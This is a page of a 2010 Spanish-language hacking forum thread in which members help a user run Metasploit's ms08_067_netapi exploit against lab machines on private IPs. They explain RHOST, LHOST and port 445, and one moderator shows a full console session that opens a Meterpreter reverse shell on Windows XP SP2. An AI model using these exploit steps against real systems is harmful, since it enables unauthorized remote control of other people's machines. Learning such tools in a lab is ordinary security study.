elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ayuda Nmap y Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Nmap y Metasploit  (Leído 28,699 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #10 en: 7 Enero 2010, 18:39 pm »

Pwned, como bien lo dijistes

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445

Verificalo en el RPORT
En línea

Te vendería mi talento por poder dormir tranquilo.
Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #11 en: 7 Enero 2010, 18:42 pm »

No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.

Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa.  :silbar:
« Última modificación: 7 Enero 2010, 18:52 pm por Masita » En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #12 en: 7 Enero 2010, 18:45 pm »

cpu2 YOU'VE BEEN PWNED

En línea




xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #13 en: 7 Enero 2010, 19:17 pm »

Gracais a todos por ayudarme y contestar tan rapido

Shell Root
Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?

rokernault

Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.

Un saludo
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #14 en: 7 Enero 2010, 19:25 pm »

cpu2, a ver,

1. RHOST= Host_Remoto; LHOST= Host_Local
    RPORT= Puerto_Remoto; LPORT= Puerto_Local

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!
« Última modificación: 7 Enero 2010, 19:27 pm por Shell Root » En línea

Te vendería mi talento por poder dormir tranquilo.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #15 en: 7 Enero 2010, 19:49 pm »

samba

la he cagao..

http://en.wikipedia.org/wiki/Server_Message_Block


saludos
En línea




xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #16 en: 7 Enero 2010, 20:00 pm »

Shell Root mira es lo que me sale ami

use exploit/windows/smb/ms08_067_netapi   <------------- ningun problema

show options

Module options:
 Name     Current Setting  Required  Description
 ---------   ------------------  ------------  -------------
RHOST                                  yes         The target address
RPORT   445                         yes         Set the SMB service port
SMBPIPE  BROWSER           yes         The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id  Name
--  ----
 0   Automatic Targeting

Vale me sale eso por lo que e visto en el video todo igual

set RHOST 192.168.1.32

set payload windows/shell/bind_tcp

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

Exploit target:
Id  Name
--  ----
 0   Automatic Targeting

eso sale

exploit

    *  Started bind handler
      [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
    * Exploit completed, but no session was created.

eso es mi caso alguna idea creo que lo ago bien?
Un saludo

En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #17 en: 7 Enero 2010, 20:07 pm »

1. Ingresando RHOST y LHOST iguales, WTF!
    No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P
2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!

Saludos!
« Última modificación: 7 Enero 2010, 20:09 pm por Shell Root » En línea

Te vendería mi talento por poder dormir tranquilo.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #18 en: 7 Enero 2010, 20:16 pm »

Citar
Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

mira bien las ip..

da igual, la maquina no es vulnerable
En línea




Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #19 en: 7 Enero 2010, 20:42 pm »

mira bien las ip..

No tiene nada que ver, mira.

Citar
Código:
                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |  
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|                  


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 28 days hago (2009.12.10)


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on port 4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Sending stage (723456 bytes)
  • Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]

    meterpreter >
Saludos!
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nmap, Nessus y Metasploit
Dudas Generales
El Gnomo 1 4,555 Último mensaje 10 Enero 2011, 01:27 am
por Shell Root
Nmap, Nessus y Metasploit
Hacking
El Gnomo 2 5,460 Último mensaje 13 Enero 2011, 23:26 pm
por El Gnomo
Ayuda urgente con los NSE de nmap-6.00
Hacking
D4rck4r 2 2,606 Último mensaje 11 Junio 2012, 02:59 am
por D4rck4r
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
robertito_prado 3 3,194 Último mensaje 23 Julio 2012, 03:33 am
por robertito_prado
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
D4rck4r 0 2,121 Último mensaje 10 Agosto 2012, 20:38 pm
por D4rck4r
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines